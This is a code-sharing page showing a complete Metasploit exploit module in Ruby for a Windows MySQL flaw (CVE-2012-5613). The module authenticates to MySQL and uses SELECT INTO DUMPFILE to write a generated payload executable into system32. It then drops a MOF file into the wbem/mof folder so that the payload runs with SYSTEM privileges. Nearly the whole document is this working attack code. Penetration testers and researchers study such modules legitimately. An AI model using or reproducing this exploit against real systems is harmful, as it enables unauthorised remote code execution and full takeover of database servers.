扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 |
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL include Msf::Exploit::WbemExec include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle MySQL for Microsoft Windows MOF Execution', 'Description'=> %q{ This modules takes advantage of a file privilege misconfiguration problem specifically against Windows MySQL servers (due to the use of a .mof file). This may result in arbitrary code execution under the context of SYSTEM. However, please note in order to use this module, you must have a valid MySQL account on the target machine. }, 'Author' => [ 'kingcope', 'sinn3r' ], 'License'=> MSF_LICENSE, 'References' => [ ['CVE', '2012-5613'], #DISPUTED ['EDB', '23083'], ['URL', 'http://seclists.org/fulldisclosure/2012/Dec/13'] ], 'Platform' => 'win', 'Targets'=> [ [ 'MySQL on Windows', { } ] ], 'DefaultTarget'=> 0, 'DisclosureDate' => 'Dec 01 2012' )) register_options( [ OptString.new('USERNAME', [ true, 'The username to authenticate as']), OptString.new('PASSWORD', [ true, 'The password to authenticate with']) ]) end def check begin m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) rescue RbMysql::AccessDeniedError print_error("#{peer} - Access denied.") return Exploit::CheckCode::Safe end return Exploit::CheckCode::Appears if is_windows? return Exploit::CheckCode::Safe end def peer "#{rhost}:#{rport}" end def query(q) rows = [] begin res = mysql_query(q) return rows if not res res.each_hash do |row| rows << row end rescue RbMysql::ParseError return rows end return rows end def is_windows? r = query("SELECT @@version_compile_os;") return (r[0]['@@version_compile_os'] =~ /^Win/) ? true : false end def get_drive_letter r = query("SELECT @@tmpdir;") drive = r[0]['@@tmpdir'].scan(/^(\w):/).flatten[0] || '' return drive end def upload_file(bin, dest) p = bin.unpack("H*")[0] query("SELECT 0x#{p} into DUMPFILE '#{dest}'") end def exploit print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") begin m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) return if not m rescue RbMysql::AccessDeniedError print_error("#{peer} - Access denied.") return end if not is_windows? print_error("#{peer} - Remote host isn't Windows.") return end drive= get_drive_letter exe_name = Rex::Text::rand_text_alpha(5) + ".exe" dest = "#{drive}:/windows/system32/#{exe_name}" exe= generate_payload_exe print_status("#{peer} - Uploading to '#{dest}'") begin upload_file(exe, dest) register_file_for_cleanup("#{exe_name}") rescue RbMysql::AccessDeniedError print_error("#{peer} - No permission to write. I blame kc :-)") return end mof_name = Rex::Text::rand_text_alpha(5) + ".mof" dest = "#{drive}:/windows/system32/wbem/mof/#{mof_name}" mof= generate_mof(mof_name, exe_name) print_status("#{peer} - Uploading to '#{dest}'") begin upload_file(mof, dest) register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}") rescue RbMysql::AccessDeniedError print_error("#{peer} - No permission to write. Bail!") return end end end |
体验盒子
